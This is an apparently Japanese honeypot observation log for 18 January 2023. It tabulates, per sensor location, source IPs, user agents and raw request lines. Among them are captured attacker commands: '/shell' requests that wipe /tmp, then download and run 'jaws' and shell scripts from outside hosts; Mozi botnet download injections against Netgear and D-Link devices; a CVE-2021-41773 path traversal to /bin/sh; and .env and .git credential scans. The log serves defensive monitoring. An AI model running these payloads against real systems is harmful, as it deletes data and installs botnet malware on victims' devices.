ハニーポット(仮) 観測記録 2023/01/18分です。
特徴
共通
GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為
Location:JP
D-link製品の脆弱性を狙うアクセス
fasthttpによるスキャン行為
masscanによるスキャン行為
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 45.12.253.180/jaws; sh /tmp/jaws
Location:US
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Apache Tomcatへのスキャン行為
を確認しました。
Location:UK
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 5.255.105.71/76d32be0.sh; sh /tmp/76d32be0.sh
cd /tmp; rm -rf *; wget heylitimysun.top/jaws; sh /tmp/jaws
Location:SG
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
masscanによるスキャン行為
/.awsへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 45.12.253.180/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:132 (前日比:-360)
US:総アクセス数:87 (前日比:-68)
UK:総アクセス数:111 (前日比:-30)
SG:総アクセス数:101 (前日比:-774)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 4.16.142.230 | United States |
| 2 | 8.219.202.191 | Singapore |
| 44 | 18.130.112.220 | United States |
| 11 | 34.228.42.234 | United States |
| 1 | 35.91.2.14 | United States |
| 1 | 45.12.253.180 | Bulgaria |
| 1 | 45.33.80.243 | United States |
| 1 | 45.56.108.128 | United States |
| 1 | 45.224.250.45 | Brazil |
| 1 | 62.225.41.210 | Germany |
| 1 | 66.240.205.34 | United States |
| 2 | 68.183.97.239 | United States |
| 1 | 80.94.95.25 | Romania |
| 8 | 95.214.235.205 | Ukraine |
| 1 | 121.231.30.228 | China |
| 8 | 135.125.217.54 | France |
| 8 | 135.125.244.48 | France |
| 1 | 151.80.238.18 | Italy |
| 5 | 154.26.136.165 | United States |
| 2 | 161.35.160.27 | United States |
| 1 | 167.94.138.62 | United States |
| 1 | 172.104.11.34 | United States |
| 3 | 172.104.11.51 | United States |
| 1 | 172.104.131.24 | United States |
| 5 | 172.105.82.111 | United States |
| 4 | 183.136.225.32 | China |
| 2 | 185.254.196.115 | Ukraine |
| 1 | 190.83.25.152 | Brazil |
| 1 | 192.155.90.220 | United States |
| 1 | 192.241.203.202 | United States |
| 1 | 193.35.18.107 | Bulgaria |
| 1 | 193.35.18.110 | Bulgaria |
| 5 | 193.149.176.185 | United States |
| 1 | 194.180.49.233 | Bulgaria |
| 1 | 198.199.95.35 | United States |
| 1 | 205.210.31.13 | United States |
| 1 | 205.210.31.50 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 25 | - |
| 1 | ELinks/0.12~pre5-4 |
| 6 | Go-http-client/1.1 |
| 2 | Hello, world |
| 1 | Java/1.6.0_13 |
| 1 | Mozila/5.0 |
| 1 | Mozilla/5.0 (Linux; Android 6.0.1; MI 5 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/3072 MicroMessenger/7.0.3.1400(0x2700033C) Process/tools NetType/WIFI Language/zh_CN |
| 1 | Mozilla/5.0 (Linux; Android 8.0.0; RNE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 |
| 1 | Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 |
| 1 | Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 |
| 1 | Mozilla/5.0 (Linux; Android 9; Mi A1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 |
| 1 | Mozilla/5.0 (Linux; Android 9; Redmi Note 5 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 |
| 5 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
| 1 | Mozilla/5.0 (OS/2; Warp 4.5; rv:45.0) Gecko/20100101 Firefox/45.0 |
| 1 | Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 |
| 1 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240 |
| 1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Whale/1.5.75.9 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/5.0.4.3000 Chrome/47.0.2526.73 Safari/537.36 |
| 6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 |
| 4 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
| 1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3947.100 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3879.0 Safari/537.36 Edg/78.0.249.0 |
| 1 | Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0 |
| 1 | Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 635) like Gecko |
| 1 | Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 |
| 1 | Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 Vivaldi/1.0.344.37 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36 |
| 28 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/73.0.3683.86 Chrome/73.0.3683.86 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1 |
| 1 | Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5) |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 1 | Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11; |
| 1 | Mozilla/5.0 (compatible; Konqueror/4.4; Linux) KHTML/4.4.1 (like Gecko) Fedora/4.4.1-1.fc12 |
| 1 | Mozilla/5.0 (iPhone; CPU iPhone OS 11_4 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/604.1 |
| 1 | Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/75.0.3770.103 Mobile/15E148 Safari/605.1 |
| 1 | Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.3(0x17000321) NetType/WIFI Language/zh_CN |
| 1 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1 |
| 1 | Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 |
| 3 | Mozilla/5.0 zgrab/0.x |
| 1 | Opera/9.30 (Nintendo Wii; U; ; 2047-7; en) |
| 1 | SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 |
| 1 | SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 |
| 1 | SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 |
| 2 | fasthttp |
| 1 | masscan/1.3 (https[:]//github[.]com/robertdavidgraham/masscan) |
| 1 | python-requests/2.25.1 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - |
||
| 1 | ABCDEFGHIJKLMNOPQRSTUVWXYZ9999 |
||
| 1 | Gh0st\xad |
||
| 1 | MGLNDD_18.179.20.5_80\n |
||
| 15 | \x16\x03\x01 |
||
| 4 | \x16\x03\x02\x01o\x01 |
||
| 1 | CONNECT | cipicaoadminpanel[.]xyz:443 |
HTTP/1.1 |
| 1 | CONNECT | google[.]com:443 |
HTTP/1.1 |
| 1 | GET | ../../proc/ HTTP |
|
| 29 | GET | /.env |
HTTP/1.1 |
| 2 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /.git2/config |
HTTP/1.1 |
| 1 | GET | /99vt |
HTTP/1.1 |
| 1 | GET | /99vu |
HTTP/1.1 |
| 1 | GET | /AWSconf.git/config |
HTTP/1.1 |
| 1 | GET | /__MACOSX/.git/config |
HTTP/1.1 |
| 1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
| 1 | GET | /a/.git/config |
HTTP/1.1 |
| 1 | GET | /aaa9 |
HTTP/1.1 |
| 1 | GET | /aaaaaaaaaaaaaaaaaaaaaaaaaqr |
HTTP/1.1 |
| 1 | GET | /aab8 |
HTTP/1.1 |
| 1 | GET | /admin/.git/config |
HTTP/1.1 |
| 1 | GET | /amphtml/.git/config |
HTTP/1.1 |
| 1 | GET | /aomanalyzer/.git/config |
HTTP/1.1 |
| 1 | GET | /api/.git/config |
HTTP/1.1 |
| 1 | GET | /app/.git/config |
HTTP/1.1 |
| 1 | GET | /application/.git/config |
HTTP/1.1 |
| 1 | GET | /backup/.git/config |
HTTP/1.1 |
| 1 | GET | /beta/.git/config |
HTTP/1.1 |
| 1 | GET | /blog/.git/config |
HTTP/1.1 |
| 1 | GET | /blog/wp-content/themes/.git/config |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 |
HTTP/1.0 |
| 1 | GET | /build/.git/config |
HTTP/1.1 |
| 1 | GET | /cms/.git/config |
HTTP/1.1 |
| 1 | GET | /common/.git/config |
HTTP/1.1 |
| 1 | GET | /config.json |
HTTP/1.1 |
| 1 | GET | /data/.git/config |
HTTP/1.1 |
| 1 | GET | /database/.git/config |
HTTP/1.1 |
| 1 | GET | /debug/default/view?panel=config |
HTTP/1.1 |
| 1 | GET | /demo/.git/config |
HTTP/1.1 |
| 1 | GET | /dev/.git/config |
HTTP/1.1 |
| 1 | GET | /developer/.git/config |
HTTP/1.1 |
| 1 | GET | /dot.git/config |
HTTP/1.1 |
| 3 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /flock/.git/config |
HTTP/1.1 |
| 1 | GET | /gate.php |
HTTP/1.1 |
| 1 | GET | /git/.git/config |
HTTP/1.1 |
| 1 | GET | /live/.git/config |
HTTP/1.1 |
| 1 | GET | /m/.git/config |
HTTP/1.1 |
| 1 | GET | /manager/text/list |
HTTP/1.1 |
| 2 | GET | /metrics |
HTTP/1.1 |
| 1 | GET | /new/.git/config |
HTTP/1.1 |
| 1 | GET | /old-cuburn/.git/config |
HTTP/1.1 |
| 1 | GET | /prod.git/config |
HTTP/1.1 |
| 1 | GET | /public/.git/config |
HTTP/1.1 |
| 1 | GET | /qa/.git/config |
HTTP/1.1 |
| 1 | GET | /repos/.git/config |
HTTP/1.1 |
| 1 | GET | /repository/.git/config |
HTTP/1.1 |
| 5 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /s3/.git/config |
HTTP/1.1 |
| 1 | GET | /samples/.git/config |
HTTP/1.1 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+45[.]12[.]253[.]180/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /shop/.git/config |
HTTP/1.1 |
| 1 | GET | /site/.git/config |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /staging/.git/config |
HTTP/1.1 |
| 1 | GET | /static/.git/config |
HTTP/1.1 |
| 1 | GET | /store/.git/config |
HTTP/1.1 |
| 2 | GET | /systembc/password.php |
HTTP/1.0 |
| 2 | GET | /v2/ |
HTTP/1.1 |
| 1 | GET | /vendor/.git/config |
HTTP/1.1 |
| 1 | GET | /web/.git/config |
HTTP/1.1 |
| 1 | GET | /wiki/.git/config |
HTTP/1.1 |
| 1 | HEAD | / |
HTTP/1.1 |
| 1 | POST | /HNAP1/ |
HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 13.39.108.45 | United States |
| 1 | 44.200.29.107 | United States |
| 2 | 45.79.128.205 | United States |
| 1 | 45.79.181.104 | United States |
| 26 | 51.79.29.48 | Canada |
| 1 | 64.62.197.26 | United States |
| 1 | 66.175.213.4 | United States |
| 1 | 80.94.95.25 | Romania |
| 4 | 107.150.99.175 | United States |
| 2 | 134.209.247.224 | United States |
| 1 | 139.162.236.179 | Netherlands |
| 2 | 144.24.4.74 | Greece |
| 3 | 152.89.196.211 | Russia |
| 2 | 159.89.126.91 | United States |
| 2 | 161.97.174.99 | Germany |
| 2 | 162.142.125.7 | United States |
| 2 | 167.248.133.44 | United States |
| 2 | 170.64.134.162 | United States |
| 2 | 172.104.11.51 | United States |
| 1 | 172.105.128.13 | United States |
| 2 | 173.214.175.178 | United States |
| 3 | 179.43.177.242 | Panama |
| 1 | 181.214.206.186 | United States |
| 3 | 183.136.225.32 | China |
| 1 | 185.36.81.23 | United Kingdom |
| 5 | 185.254.196.223 | Ukraine |
| 1 | 192.155.90.118 | United States |
| 1 | 192.155.90.220 | United States |
| 1 | 192.241.239.16 | United States |
| 1 | 193.35.18.107 | Bulgaria |
| 1 | 194.55.186.216 | Bulgaria |
| 1 | 194.180.49.108 | Bulgaria |
| 1 | 194.180.49.233 | Bulgaria |
| 4 | 205.185.118.237 | United States |
| 1 | 205.210.31.19 | United States |
| 1 | 205.210.31.172 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 19 | - |
| 8 | Go-http-client/1.1 |
| 3 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15 |
| 1 | Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE6-00/021.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.16 Mobile Safari/533.4 3gpp-gba |
| 3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 3 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
| 1 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 |
| 32 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 9 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 1 | Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A403 Safari/8536.25 |
| 3 | Mozilla/5.0 zgrab/0.x |
| 1 | python-requests/2.28.1 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x16\x03\x01\x01\t\x01 |
||
| 15 | \x16\x03\x01 |
||
| 1 | CONNECT | cipicaoadminpanel[.]xyz:443 |
HTTP/1.1 |
| 2 | CONNECT | google[.]com:443 |
HTTP/1.1 |
| 1 | GET | ../../proc/ HTTP |
|
| 34 | GET | /.env |
HTTP/1.1 |
| 3 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /aaa9 |
HTTP/1.1 |
| 1 | GET | /aab8 |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 6 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /manager/html |
HTTP/1.1 |
| 1 | GET | /metrics |
HTTP/1.1 |
| 2 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /v2/ |
HTTP/1.1 |
| 2 | HEAD | / |
HTTP/1.1 |
| 9 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
| 2 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 3.249.89.126 | United States |
| 1 | 5.181.86.250 | Ukraine |
| 1 | 14.146.95.176 | China |
| 1 | 31.7.63.42 | Panama |
| 1 | 42.224.10.15 | China |
| 2 | 45.9.110.186 | Hong Kong |
| 1 | 45.33.80.243 | United States |
| 1 | 45.79.181.94 | United States |
| 2 | 45.79.181.104 | United States |
| 2 | 45.79.181.223 | United States |
| 1 | 45.79.181.251 | United States |
| 33 | 51.79.29.48 | Canada |
| 1 | 62.233.50.179 | Russia |
| 1 | 64.62.197.230 | United States |
| 1 | 80.94.95.25 | Romania |
| 4 | 104.218.164.140 | United States |
| 1 | 104.221.217.194 | United States |
| 1 | 107.170.192.19 | United States |
| 1 | 107.170.246.26 | United States |
| 1 | 112.239.100.139 | China |
| 1 | 128.14.134.134 | United States |
| 9 | 152.89.196.211 | Russia |
| 2 | 159.223.185.122 | United States |
| 2 | 162.142.125.213 | United States |
| 1 | 162.243.145.20 | United States |
| 2 | 167.94.138.118 | United States |
| 2 | 170.64.132.128 | United States |
| 1 | 172.104.11.4 | United States |
| 1 | 172.104.11.46 | United States |
| 1 | 172.104.131.24 | United States |
| 2 | 172.105.128.13 | United States |
| 1 | 173.63.213.76 | United States |
| 1 | 173.214.175.178 | United States |
| 1 | 174.138.72.16 | United States |
| 1 | 178.46.208.117 | Russia |
| 1 | 178.128.83.89 | United States |
| 4 | 179.43.177.242 | Panama |
| 1 | 181.214.206.186 | United States |
| 1 | 185.241.208.193 | Netherlands |
| 8 | 185.254.196.223 | Ukraine |
| 1 | 192.155.90.118 | United States |
| 1 | 193.35.18.110 | Bulgaria |
| 1 | 198.199.101.225 | United States |
| 4 | 205.185.118.237 | United States |
| 1 | 205.210.31.9 | United States |
| 1 | 210.89.63.243 | India |
| 1 | 222.170.230.14 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 28 | - |
| 6 | Go-http-client/1.1 |
| 1 | Googlebot-Image/1.0 |
| 2 | Hello, world |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 |
| 2 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
| 1 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 |
| 43 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 9 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 1 | Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/16D57 |
| 5 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ |
HTTP/1.0 | |
| 1 | ABCDEFGHIJKLMNOPQRSTUVWXYZ9999 |
||
| 1 | MGLNDD_132.145.66.34_80\n |
||
| 1 | SSH-2.0-libssh2_1.10.0 |
||
| 1 | \x03 |
||
| 1 | \x16\x03\x01\x01\t\x01 |
||
| 16 | \x16\x03\x01 |
||
| 1 | CONNECT | cipicaoadminpanel[.]xyz:443 |
HTTP/1.1 |
| 2 | CONNECT | google[.]com:443 |
HTTP/1.1 |
| 43 | GET | /.env |
HTTP/1.1 |
| 2 | GET | /.git/config |
HTTP/1.1 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 1 | GET | /ReportServer |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /aaa9 |
HTTP/1.1 |
| 1 | GET | /aab8 |
HTTP/1.1 |
| 2 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /admin/ |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 |
HTTP/1.0 |
| 1 | GET | /console/ |
HTTP/1.1 |
| 5 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /manager/html |
HTTP/1.1 |
| 1 | GET | /manager/text/list |
HTTP/1.1 |
| 2 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//14[.]146[.]95[.]176:43082/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+5[.]255[.]105[.]71/76d32be0.sh;sh+/tmp/76d32be0.sh |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+heylitimysun[.]top/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | http[:]//132[.]145[.]66[.]34:80/mysql-admin/scripts/setup.php |
HTTP/1.0 |
| 1 | HEAD | / |
HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 1 | POST | /HNAP1/ |
HTTP/1.0 |
| 9 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
| 2 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 4.1.229.86 | United States |
| 1 | 31.7.63.42 | Panama |
| 1 | 45.79.128.205 | United States |
| 1 | 45.79.181.94 | United States |
| 2 | 45.79.181.179 | United States |
| 1 | 45.79.181.251 | United States |
| 32 | 51.79.29.48 | Canada |
| 1 | 62.233.50.179 | Russia |
| 1 | 64.62.197.132 | United States |
| 1 | 66.175.213.4 | United States |
| 1 | 80.94.95.25 | Romania |
| 1 | 102.215.189.167 | private ip address |
| 1 | 107.170.247.20 | United States |
| 7 | 136.144.35.46 | Netherlands |
| 7 | 152.89.196.211 | Russia |
| 1 | 159.65.5.165 | United States |
| 2 | 162.142.125.210 | United States |
| 2 | 162.142.125.213 | United States |
| 1 | 162.243.146.6 | United States |
| 2 | 167.71.234.90 | United States |
| 2 | 170.64.158.80 | United States |
| 1 | 172.104.11.4 | United States |
| 2 | 172.104.11.34 | United States |
| 1 | 172.104.11.51 | United States |
| 1 | 172.104.131.24 | United States |
| 4 | 172.105.82.111 | United States |
| 1 | 172.105.128.12 | United States |
| 1 | 172.105.128.13 | United States |
| 2 | 173.214.175.178 | United States |
| 3 | 179.43.177.242 | Panama |
| 6 | 183.136.225.32 | China |
| 1 | 192.241.209.4 | United States |
| 1 | 193.35.18.107 | Bulgaria |
| 1 | 193.35.18.110 | Bulgaria |
| 2 | 194.55.186.216 | Bulgaria |
| 4 | 205.185.118.237 | United States |
| 1 | 205.210.31.21 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 23 | - |
| 4 | Go-http-client/1.1 |
| 1 | Hello, world |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.126 Safari/537.36 |
